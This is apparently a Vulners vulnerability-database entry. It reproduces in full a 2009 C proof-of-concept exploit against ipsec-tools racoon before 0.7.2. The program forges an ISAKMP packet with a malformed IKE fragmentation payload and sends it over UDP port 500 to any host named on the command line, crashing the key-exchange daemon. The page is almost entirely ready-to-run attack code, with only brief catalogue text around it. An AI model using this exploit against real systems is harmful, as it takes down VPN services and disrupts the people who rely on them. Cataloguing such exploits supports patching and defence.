Vulners
Lucene search
IPsec-Tools Prior to 0.7.2 Multiple Remote Denial Of Service Vulnerabilities
/* racoon-isakmp-dos.c
*
* Copyright (c) 2009 by <[email protected]>
*
* ipsec-tools racoon frag-isakmp DoS POC
* by mu-b - Thu Apr 02 2009
*
* - Tested on: ipsec-tools-0.7.1
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2009!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#define DEF_PORT 500
#define PORT_ISAKMP DEF_PORT
#define ISAKMP_VERSION_NUMBER 0x10
#define ISAKMP_ETYPE_BASE 1 /* Base */
/* Frag does not seems to be documented */
#define ISAKMP_NPTYPE_FRAG 132 /* IKE fragmentation payload */
/* flags */
#define ISAKMP_FRAG_LAST 1
typedef u_char cookie_t[8];
/* 3.1 ISAKMP Header Format */
struct isakmp {
cookie_t i_ck; /* Initiator Cookie */
cookie_t r_ck; /* Responder Cookie */
unsigned char np; /* Next Payload Type */
unsigned char v;
unsigned char etype; /* Exchange Type */
unsigned char flags; /* Flags */
unsigned int msgid;
unsigned int len; /* Length */
};
/* IKE fragmentation payload */
struct isakmp_frag {
unsigned short unknown0; /* always set to zero? */
unsigned short len;
unsigned short unknown1; /* always set to 1? */
unsigned char index;
unsigned char flags;
};
/* used to verify the r_ck. */
static u_char r_ck0[] = { 0,0,0,0,0,0,0,0 };
static void
isa_kmp_dos (char *host)
{
char buf[sizeof (struct isakmp) +
sizeof (struct isakmp_frag)];
struct isakmp *hdr;
struct isakmp_frag *frag;
struct sockaddr_in saddr;
struct hostent *hp;
int fd, i, len, n;
if ((fd = socket (AF_INET, SOCK_DGRAM, 0)) == -1)
{
perror ("socket()");
exit (EXIT_FAILURE);
}
if ((hp = gethostbyname (host)) == NULL)
{
perror ("gethostbyname()");
exit (EXIT_FAILURE);
}
memset (&saddr, 0, sizeof saddr);
memcpy ((char *) &saddr.sin_addr, hp->h_addr, hp->h_length);
saddr.sin_family = AF_INET;
saddr.sin_port = htons (PORT_ISAKMP);
/* formulate request */
memset (buf, 0, sizeof (buf));
hdr = (struct isakmp *) buf;
frag = (struct isakmp_frag *) (hdr + 1);
for (i = 0; i < sizeof (hdr->i_ck); i++)
hdr->i_ck[i] = (rand () % 255) + 1;
memcpy (&hdr->r_ck, r_ck0, sizeof (hdr->r_ck));
hdr->v = ISAKMP_VERSION_NUMBER;
hdr->flags = 0;
hdr->etype = ISAKMP_ETYPE_BASE;
hdr->msgid = 0;
hdr->np = ISAKMP_NPTYPE_FRAG;
len = sizeof (struct isakmp) + sizeof (struct isakmp_frag);
hdr->len = htonl (len);
frag->len = htons (sizeof (struct isakmp_frag));
frag->index = 1;
frag->flags = ISAKMP_FRAG_LAST;
n = sendto (fd, hdr, len, 0, (struct sockaddr *) &saddr, sizeof saddr);
if (n < 0 || n != len)
{
fprintf (stderr, "isa_kmp_dos: sendto %d != %d\n", n, len);
exit (EXIT_FAILURE);
}
close (fd);
}
int
main (int argc, char **argv)
{
printf ("ipsec-tools racoon frag-isakmp DoS PoC\n"
"by: <[email protected]>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <host>\n", argv[0]);
exit (EXIT_SUCCESS);
}
printf ("* crashing racoon... ");
isa_kmp_dos (argv[1]);
printf ("done\n\n");
return (EXIT_SUCCESS);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Nov 2009 00:00Current
7.1High risk
Vulners AI Score7.1